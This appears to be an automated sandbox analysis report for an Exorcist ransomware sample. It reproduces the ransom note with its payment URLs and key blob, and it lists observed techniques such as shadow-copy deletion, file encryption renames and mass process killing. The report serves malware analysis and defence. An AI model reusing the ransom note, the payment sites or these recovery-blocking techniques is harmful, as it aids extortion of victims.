exorcist | 9aa75631b7a56a84117e5aed0540fb74dfcde2c36d52744156381c9161603e28

Resubmissions

23-07-2020 14:59

200723-qeb9jz5z6e 10

23-07-2020 13:40

200723-1el7ztcngs 10

Analysis

max time kernel
109s
max time network
91s
platform
windows7_x64
resource
win7v200722
submitted
23-07-2020 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

build-x32.crypt.bin.exe

Score

10^/10

ransomware exorcist persistence

Malware Config

Extracted

Path

C:\Users\Public\Desktop\ntIpgn-decrypt.hta

Family

exorcist

Ransom Note

ntIpgn Decrypt All your data has been encrypted with Exorcist Ransomware. Do not worry: you have some hours to contact us and decrypt your data by paying a ransom. To do this, follow instructions on this web site: http://217.8.117.26/pay Also, you can install Tor Browser and use this web site: http://4dnd3utjsmm2zcsb.onion/pay IMPORTANT: Do not modify this file, otherwise you will not be able to recover your data! Your authorization key: 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

URLs

http://217.8.117.26/pay

http://4dnd3utjsmm2zcsb.onion/pay

Signatures

Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\RepairRead.raw => C:\Users\Admin\Pictures\RepairRead.raw.ntIpgn	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RepairRead.raw.ntIpgn	build-x32.crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ResumeSearch.crw => C:\Users\Admin\Pictures\ResumeSearch.crw.ntIpgn	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\UndoSubmit.crw.ntIpgn	build-x32.crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\UnpublishResize.raw => C:\Users\Admin\Pictures\UnpublishResize.raw.ntIpgn	build-x32.crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\CompressShow.raw => C:\Users\Admin\Pictures\CompressShow.raw.ntIpgn	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CompressShow.raw.ntIpgn	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ResumeSearch.crw.ntIpgn	build-x32.crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\UndoSubmit.crw => C:\Users\Admin\Pictures\UndoSubmit.crw.ntIpgn	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\UnpublishResize.raw.ntIpgn	build-x32.crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\RegisterConnect.crw => C:\Users\Admin\Pictures\RegisterConnect.crw.ntIpgn	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterConnect.crw.ntIpgn	build-x32.crypt.bin.exe

Deletes itself 1 IoCs

pid	Process
2024	cmd.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	build-x32.crypt.bin.exe
File opened (read-only)	\??\K:	build-x32.crypt.bin.exe
File opened (read-only)	\??\M:	build-x32.crypt.bin.exe
File opened (read-only)	\??\P:	build-x32.crypt.bin.exe
File opened (read-only)	\??\Q:	build-x32.crypt.bin.exe
File opened (read-only)	\??\V:	build-x32.crypt.bin.exe
File opened (read-only)	\??\X:	build-x32.crypt.bin.exe
File opened (read-only)	\??\F:	build-x32.crypt.bin.exe
File opened (read-only)	\??\J:	build-x32.crypt.bin.exe
File opened (read-only)	\??\E:	build-x32.crypt.bin.exe
File opened (read-only)	\??\B:	build-x32.crypt.bin.exe
File opened (read-only)	\??\H:	build-x32.crypt.bin.exe
File opened (read-only)	\??\L:	build-x32.crypt.bin.exe
File opened (read-only)	\??\O:	build-x32.crypt.bin.exe
File opened (read-only)	\??\S:	build-x32.crypt.bin.exe
File opened (read-only)	\??\T:	build-x32.crypt.bin.exe
File opened (read-only)	\??\U:	build-x32.crypt.bin.exe
File opened (read-only)	\??\A:	build-x32.crypt.bin.exe
File opened (read-only)	\??\Z:	build-x32.crypt.bin.exe
File opened (read-only)	\??\Y:	build-x32.crypt.bin.exe
File opened (read-only)	\??\N:	build-x32.crypt.bin.exe
File opened (read-only)	\??\R:	build-x32.crypt.bin.exe
File opened (read-only)	\??\W:	build-x32.crypt.bin.exe
File opened (read-only)	\??\I:	build-x32.crypt.bin.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	build-x32.crypt.bin.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1072	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
756	vssadmin.exe

Kills process with taskkill 91 IoCs

evasion

pid	Process
1756	taskkill.exe
1868	taskkill.exe
1020	taskkill.exe
1856	taskkill.exe
756	taskkill.exe
1564	taskkill.exe
1112	taskkill.exe
1556	taskkill.exe
1868	taskkill.exe
1912	taskkill.exe
1920	taskkill.exe
1868	taskkill.exe
1588	taskkill.exe
340	taskkill.exe
1828	taskkill.exe
1624	taskkill.exe
2024	taskkill.exe
1604	taskkill.exe
664	taskkill.exe
1960	taskkill.exe
272	taskkill.exe
1608	taskkill.exe
1604	taskkill.exe
1060	taskkill.exe
1624	taskkill.exe
1328	taskkill.exe
1516	taskkill.exe
792	taskkill.exe
1624	taskkill.exe
1516	taskkill.exe
1988	taskkill.exe
1252	taskkill.exe
1184	taskkill.exe
572	taskkill.exe
1348	taskkill.exe
2028	taskkill.exe
612	taskkill.exe
1476	taskkill.exe
324	taskkill.exe
508	taskkill.exe
1556	taskkill.exe
1744	taskkill.exe
508	taskkill.exe
1360	taskkill.exe
1360	taskkill.exe
1644	taskkill.exe
1476	taskkill.exe
1840	taskkill.exe
2024	taskkill.exe
1588	taskkill.exe
612	taskkill.exe
1252	taskkill.exe
2028	taskkill.exe
1740	taskkill.exe
1872	taskkill.exe
1812	taskkill.exe
740	taskkill.exe
1056	taskkill.exe
1500	taskkill.exe
1552	taskkill.exe
1996	taskkill.exe
1872	taskkill.exe
792	taskkill.exe
1744	taskkill.exe
272	taskkill.exe
2028	taskkill.exe
272	taskkill.exe
1164	taskkill.exe
324	taskkill.exe
1108	taskkill.exe
2024	taskkill.exe
1396	taskkill.exe
1020	taskkill.exe
1928	taskkill.exe
1984	taskkill.exe
1756	taskkill.exe
1608	taskkill.exe
2028	taskkill.exe
2000	taskkill.exe
780	taskkill.exe
1324	taskkill.exe
460	taskkill.exe
1860	taskkill.exe
1412	taskkill.exe
1764	taskkill.exe
1764	taskkill.exe
1552	taskkill.exe
1364	taskkill.exe
1200	taskkill.exe
1184	taskkill.exe
1908	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

NTFS ADS 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ftztnzezfosqioqjq	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:qncbeovltenni	build-x32.crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:uzkcayivo	build-x32.crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:fwsjvisltoiwhlkd	build-x32.crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:uzkcayivo	build-x32.crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 348 IoCs

pid	Process
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1480	build-x32.crypt.bin.exe
1948	powershell.exe
1948	powershell.exe

Suspicious use of AdjustPrivilegeToken 132 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	792	WMIC.exe
Token: SeSecurityPrivilege	792	WMIC.exe
Token: SeTakeOwnershipPrivilege	792	WMIC.exe
Token: SeLoadDriverPrivilege	792	WMIC.exe
Token: SeSystemProfilePrivilege	792	WMIC.exe
Token: SeSystemtimePrivilege	792	WMIC.exe
Token: SeProfSingleProcessPrivilege	792	WMIC.exe
Token: SeIncBasePriorityPrivilege	792	WMIC.exe
Token: SeCreatePagefilePrivilege	792	WMIC.exe
Token: SeBackupPrivilege	792	WMIC.exe
Token: SeRestorePrivilege	792	WMIC.exe
Token: SeShutdownPrivilege	792	WMIC.exe
Token: SeDebugPrivilege	792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	792	WMIC.exe
Token: SeRemoteShutdownPrivilege	792	WMIC.exe
Token: SeUndockPrivilege	792	WMIC.exe
Token: SeManageVolumePrivilege	792	WMIC.exe
Token: 33	792	WMIC.exe
Token: 34	792	WMIC.exe
Token: 35	792	WMIC.exe
